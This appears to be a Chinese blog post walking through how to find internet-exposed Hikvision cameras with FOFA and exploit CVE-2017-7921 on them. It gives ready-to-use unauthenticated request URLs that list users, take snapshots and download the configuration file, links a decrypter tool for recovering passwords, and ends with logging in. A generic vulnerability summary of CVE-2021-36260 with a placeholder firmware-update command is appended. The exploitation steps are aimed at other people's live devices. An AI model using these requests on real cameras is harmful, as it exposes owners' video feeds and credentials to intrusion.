海康威视CVE-2017-7921漏洞查找与利用

之前查看摄像头时发现了海康威视的存在CVE-2017-7921漏洞,因此找个试下。

1、fofa搜索

直接查找海康威视和中国地区的,很遗憾大部分都不能利用

点进去就能看到登录的后台地址

可以进行弱口令尝试,此处有点困难。

2、直接查看是否存在CVE-2017-7921漏洞

CVE-2017-7921存在3个漏洞

1、检索所有用户及其角色的列表

http://camera.ip/Security/users?auth=YWRtaW46MTEK

2、在没有身份验证的情况下获取摄像头快照

http://camera.ip/onvif-http/snapshot?auth=YWRtaW46MTEK

3、下载摄像头配置账号密码文件

http://camera.ip/System/configurationFile?auth=YWRtaW46MTEK

在fofa中找到的ip大部分漏洞已被修复,如果想要尝试这个漏洞,可能得找一会

3、还原配置文件账号密码

exe地址

https://github.com/Bin4xin/bigger-than-bigger/blob/master/CoVV/Hikvision%20Unauth/hikvision-decrypter.exe

使用方式简介,打开下载的配置文件–>加密 --> 解密 --> 输出 --> 二进制文件读取

当然导入时需要选择加密

打开文件后,从之前的users中得到登录账号名为admin,可以直接搜索,找到对应的密码。

4、登录尝试


可以关注公众号:码字的秃猴,一起玩耍哦

### 关于海康威视2021年安全漏洞详情 #### CVE-2021-36260 漏洞概述 海康威视作为全球领先的安防监控设备制造商,在2021年被曝出存在一个严重的远程代码执行(RCE)漏洞,编号为CVE-2021-36260。此漏洞使未经身份验证的攻击者可以通过发送特制的HTTP请求来获得目标系统的root权限,从而全面掌控受影响的IP摄像机,并有可能进一步威胁到内部网络安全[^1]。 #### 影响范围 根据测试者的反馈,该漏洞实际上早在2016年就已经存在于某些型号的产品中,只是直到2021年才公开报道。通常情况下,2021年上半年之前生产的大多数海康威视摄像头都有可能存在这个问题。具体影响哪些版本还需依据官方公告确认[^2]。 #### 技术细节风险评估 在`/bic/ssoService/v1/keepAlive`接口上发现了另一个类似的远程命令执行漏洞,这表明除了前端设备外,后台管理系统也受到了影响。攻击者能够通过精心构建的有效载荷(Payload),成功触发这些漏洞并取得服务器的操作系统级别访问权。此类问题不仅限于单一API端点;其他服务也可能受到影响,因此进行全面的安全审查至关重要[^3]。 #### 修复措施 对于上述提到的各种形式的RCE漏洞,最有效的解决方案是尽快升级至厂商发布的最新固件或补丁程序。确保所有联网硬件运行最新的稳定版软件可以有效防止已知漏洞带来的潜在威胁。此外,定期检查官方渠道发布的信息和技术支持文档也是保持系统安全性的重要手段之一[^4]。 ```bash # 更新海康威视设备固件示例命令 (假设使用Linux环境下的wget工具下载更新包) $ wget http://example.com/path/to/latest/firmware.bin $ hikvision-firmware-updater firmware.bin ```
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值